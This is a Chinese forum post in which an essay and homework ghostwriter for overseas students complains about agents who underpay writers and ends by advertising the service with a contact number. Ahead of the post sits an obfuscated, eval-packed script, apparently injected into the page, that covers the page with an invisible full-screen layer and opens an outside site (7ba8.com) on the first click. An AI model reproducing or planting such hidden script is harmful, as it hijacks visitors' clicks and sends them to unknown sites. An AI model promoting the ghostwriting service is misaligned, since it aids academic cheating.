<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>其实,自己作为一个标题党,也着实不知道应该取一个什么样的标题。姑且这样吧。
这篇帖子呢,实际意义不大,也就是自己总结总结,然后发发牢骚。
出来两年了,见过的东西,平时生活中遇到的坑也自然多了。所以,愿意分享一些经验,或者说教训吧。
实话实说,我现在是做**SPAM**,申请辅导,作业代写这么一个工作的,原因也就是接下来我要说的坑了。
出来两年,但凡有点自尊心(家里条件差)的人都会想着说要自己挣钱自己花,但是,一介书生,平时天天就是啃课本,知识,能干嘛?还好,我的文笔不错,那么就学着学长,前辈的,去帮帮(赚生活费)别人! 然后开始接触了现在这个行业。
用现下流行的语句:一开始我是拒绝的,我总不能说,东西我不懂,我就随随便便帮别人写作业。但是,生活要紧。所以也就硬着头皮上了。那会从中介那里拿来的案子很多,因为价低,只能说靠量来支撑。当时觉得,每周来点作业写写,赚些钱,生活也是很滋润(当时就是一个大sb)。
但是,后来,偶然从别人那里听到的,所谓的价格(也就是中介给客户要的价格)。跟自己拿的辛辛苦苦的稿费(姑且这么叫着,体面一点),弄了半天,我一个星期,辛辛苦苦码字,怕重复,绞尽脑汁码出来的原创稿子,也才就拿那么一丢丢(比方说:100磅1000字,我也就能拿30磅了)。那一下,我蒙了。然后,我一甩手,不干了。
回过头来,不干了,干嘛?没办法,还是操起老本行,但是还从中介那里拿案子?打死不去!所以,自立门户呗。拉上几个认识的小伙伴,找了找自己的同学(少量跟我一样出国的同学),就几个人(十个人不到)开始弄了现在这个联盟。虽说,刚成立不久(一年左右吧),但是帮助过(赚过的)的学弟学妹还是挺多的,不说自己多高尚,但是不坑人,这点我自己看来还是极好的。
我不说中介不好,但是起码没有想象中那么靠谱。我曾经接过一个案子:他是被中介坑了的。而且看起来很挺伤!起因是:他本来早早做好准备要申phd,钱,资料已经给了,合同都签好了。但是,临近申请的日子,中介却独自把钱退了,理由是:负责你这个案子的顾问,辞职了。没人愿意接手(时间紧,怕来不及)。然后,就不能透露了。
说了这么多,既然是干这个的,也给自己打打广告:1648190194(联系时注明:essay)。
你联系了我,我帮过(赚过)你,你才能知道所谓的经验,和实力。我说多了,也是无用的。
看这么多东西,你也累了,无论怎么样,谢谢看完!!! |